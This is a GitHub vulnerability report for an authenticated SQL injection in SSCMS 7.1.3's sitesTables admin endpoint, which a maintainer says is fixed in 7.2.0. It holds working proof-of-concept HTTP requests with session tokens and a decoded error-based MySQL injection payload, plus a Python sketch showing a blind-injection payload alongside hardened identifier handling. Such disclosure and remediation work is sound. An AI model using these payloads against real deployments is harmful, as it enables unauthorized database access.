
background admin sql inject #3492

nolan124 opened this issue Oct 24, 2022 · 2 comments
@nolan124

Vulnerability conditions

SSCMS v7.1.3 + MySQL + administrator privileges

Vulnerability details

1. Code auditing finds the entry point: `SSCMS.Web/Controllers/Admin/Settings/Sites/SitesTablesController.GetColumns.cs`, where `tableName` is passed into a SQL statement call.

2. That code calls the `GetCount` method of `SSCMS.Core/Services/DatabaseManager.cs`.

3. `GetCount` then enters the `Quote` method of `SSCMS.Core/Services/DatabaseManager.Parser.cs`.

4. `Quote` calls `Database.cs` (`GetQuotedIdentifier`) -> `DbUtils.cs` (`GetQuotedIdentifier`) -> `MySqlImpl.cs` (`GetQuotedIdentifier`) in turn. The returned result is not filtered or otherwise sanitized before it is used in the SQL statement.

```http
GET /api/admin/settings/sitesTables/1* HTTP/1.1
Host: 192.168.3.129
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Origin: http://192.168.3.129
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1laWQiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6IkFkbWluaXN0cmF0b3IiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL2lzcGVyc2lzdGVudCI6IkZhbHNlIiwibmJmIjoxNjY2MDY1NDYwLCJleHAiOjE2NjYxNTE4NjAsImlhdCI6MTY2NjA2NTQ2MH0.C_5BVy0Tlv-s9n8Nq2zgummkzvn50prSoOefuRVhBR8
Referer: http://192.168.3.129/utils/search.html?word=1111
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: .AspNetCore.Antiforgery.63-E5AgGJCk=CfDJ8M6RIMVIA85OqO7ajAvAmn0W_d4giFi-UZleDB9SmjuNjqZshLg6aw57gScnZlpH6U67ohL01F-C9bjGigmapHHvA5s3qiVH_pJSxx6-DoVIkm0H9mRiZ7vnlUqgrXXLDHrtcZvMrPva6Cv41qAIV-I
Connection: close
```

PoC in sqlmap

PoC in Burp

```http
GET /api/admin/settings/sitesTables/%31%25%27%20%41%4e%44%20%47%54%49%44%5f%53%55%42%53%45%54%28%43%4f%4e%43%41%54%28%30%78%36%38%36%31%37%36%36%35%32%30%37%33%37%31%36%63%32%30%36%39%36%65%36%61%36%35%36%33%37%34%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%34%32%33%38%3d%34%32%33%38%2c%31%29%29%29%2c%30%78%37%31%36%62%37%31%36%62%37%31%29%2c%34%32%33%38%29%20%41%4e%44%20%27%72%6a%62%67%25%27%3d%27%72%6a%62%67 HTTP/1.1
Host: 192.168.3.129
Accept: application/json, text/plain, */*
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1laWQiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6IkFkbWluaXN0cmF0b3IiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL2lzcGVyc2lzdGVudCI6IkZhbHNlIiwibmJmIjoxNjY2MTY2NTA0LCJleHAiOjE2NjYyNTI5MDQsImlhdCI6MTY2NjE2NjUwNH0.ZyaN5rNgUQxxkfxp3-GEV_e3RdiKPG4BjVFKBPZkdTU
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Origin: http://192.168.3.129
Referer: http://192.168.3.129/ss-admin/?siteId=57
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```

The URL-encoded path segment decodes to:

```
1%' AND GTID_SUBSET(CONCAT(0x686176652073716c20696e6a656374,(SELECT (ELT(4238=4238,1)))),0x716b716b71),4238) AND 'rjbg%'='rjbg
```
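The report above describes a table name that travels from the controller into `GetCount` and is quoted but never validated. The following is an added illustration, not SSCMS code and not part of the reporter's post: it shows in a reduced form why quoting an identifier without escaping or validation lets the caller rewrite the `COUNT(*)` statement (here with a boolean-style payload in the spirit of the PoC), and two ways to close the hole. It assumes an in-memory sqlite3 database as a stand-in for MySQL (SQLite accepts MySQL-style backtick identifiers and `--` comments), and every table, row and payload in it is constructed for the example.

```python
"""Added example (hypothetical, not SSCMS code): identifier quoting without
escaping or validation versus two hardened variants.

sqlite3 stands in for MySQL; all schema, rows and payloads are constructed."""
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed schema: an ordinary table plus one an attacker wants to probe."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (id INTEGER, name TEXT);
        INSERT INTO users VALUES (1, 'a'), (2, 'b'), (3, 'c');
        CREATE TABLE secrets (token TEXT);
        INSERT INTO secrets VALUES ('s3cr3t');
        """
    )
    return conn


def quote_identifier_naive(name: str) -> str:
    """The reported pattern: wrap the identifier in backticks, escape nothing."""
    return "`" + name + "`"


def quote_identifier_mysql(name: str) -> str:
    """MySQL-style identifier quoting: an embedded backtick is doubled."""
    return "`" + name.replace("`", "``") + "`"


def count_naive(conn: sqlite3.Connection, table_name: str) -> int:
    """Vulnerable: the caller-controlled name is spliced straight into the SQL."""
    sql = "SELECT COUNT(*) FROM " + quote_identifier_naive(table_name)
    return conn.execute(sql).fetchone()[0]


def count_escaped(conn: sqlite3.Connection, table_name: str) -> int:
    """Escaping alone: the payload stays inside the identifier, so the backend
    only sees a request for a table that does not exist and raises an error."""
    sql = "SELECT COUNT(*) FROM " + quote_identifier_mysql(table_name)
    return conn.execute(sql).fetchone()[0]


# MySQL identifiers are at most 64 characters; this allow-list is deliberately
# stricter than what MySQL permits, which is the point of an allow-list.
IDENT_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_]{0,63}")


def count_validated(conn: sqlite3.Connection, table_name: str) -> int:
    """Preferred: allow-list the shape, confirm the table exists through a
    parameterized catalog lookup, and only then build the statement from the
    catalog's own copy of the name."""
    if not IDENT_RE.fullmatch(table_name):
        raise ValueError(f"invalid table name: {table_name!r}")
    row = conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name = ?",
        (table_name,),
    ).fetchone()
    if row is None:
        raise LookupError(f"unknown table: {table_name!r}")
    sql = "SELECT COUNT(*) FROM " + quote_identifier_mysql(row[0])
    return conn.execute(sql).fetchone()[0]


def blind_payload(condition: str) -> str:
    """Constructed boolean-style payload: closes the backtick, appends a WHERE
    clause over another table, and comments out the trailing quote, so the
    returned count reveals whether `condition` holds."""
    return "users` WHERE " + condition + " -- "


if __name__ == "__main__":
    db = make_db()
    # Naive path: the count flips between 3 and 0 depending on the attacker's condition.
    print(count_naive(db, blind_payload("(SELECT COUNT(*) FROM secrets) > 0")))
    print(count_naive(db, blind_payload("(SELECT COUNT(*) FROM secrets) < 0")))
    # Hardened path: the same payload is rejected before any SQL is built.
    try:
        count_validated(db, blind_payload("1=1"))
    except ValueError as exc:
        print("rejected:", exc)
```

Escaping the backtick is enough to stop the breakout, but validating the name against the catalog is the safer default for an admin endpoint whose whole purpose is to name tables: it fails closed on anything that is not an existing table and never lets the raw user string reach the query text.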

@starlying (Contributor)

Fixed in 7.2.0, thanks

@nolan124 (Author)

Found by Chaitin Security Research Lab
